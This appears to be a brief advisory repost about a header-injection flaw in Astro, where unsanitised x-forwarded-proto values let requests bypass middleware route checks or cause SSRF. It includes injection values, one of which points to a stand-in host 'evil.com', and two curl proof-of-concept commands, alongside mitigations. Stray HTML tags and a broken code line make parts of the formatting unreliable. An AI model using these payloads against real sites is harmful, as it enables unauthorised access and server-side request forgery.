Listen to this Post
In affected versions of Astro using on-demand rendering, the `createRequest` function insecurely uses the `x-forwarded-proto` and `x-forwarded-port` headers to construct the request URL without sanitization. The code directly uses these header values to build the URL string: new URL(${protocol}://${hostnamePort}${req.url}). By injecting a malicious value into the `x-forwarded-proto` header (e.g., x:admin?), an attacker can manipulate the protocol segment. The URL parser interprets `x:` as the protocol and `admin` as the pathname, bypassing slash-based path checks in middleware. This allows for route protection bypass. Similarly, injecting into the protocol field with a value like https://evil.com?` creates a URL where the host is `evil.com` and the original path becomes a query parameter, enabling SSRF if this URL is used for server-side fetches.
Platform: Astro
Version: <=2.16.0
Vulnerability: Header Injection
Severity: Critical
date: 2025
<h2 style="color: blue;">Prediction: 2025-01-15</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
curl -i -H "x-forwarded-proto: x:admin?" http://localhost:4321/admin
// Example vulnerable URL construction in Astro
const protocol = req.headers['x-forwarded-proto'] || 'http';
const hostnamePort = getHostnamePort(req); // Uses x-forwarded-port
const url = new URL(</code>${protocol}://${hostnamePort}${req.url}`);
curl -i -H "x-forwarded-proto: https://localhost/vulnerable?" http://localhost:4321/ssr
How Exploit:
Bypass middleware protection.
Cache poisoning via CDN.
Server-Side Request Forgery.
WAF bypass.
Protection from this CVE
Update Astro version.
Sanitize forwarded headers.
Validate request host/protocol.
Impact:
Admin route bypass.
Application Denial-of-Service.
Internal service access.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
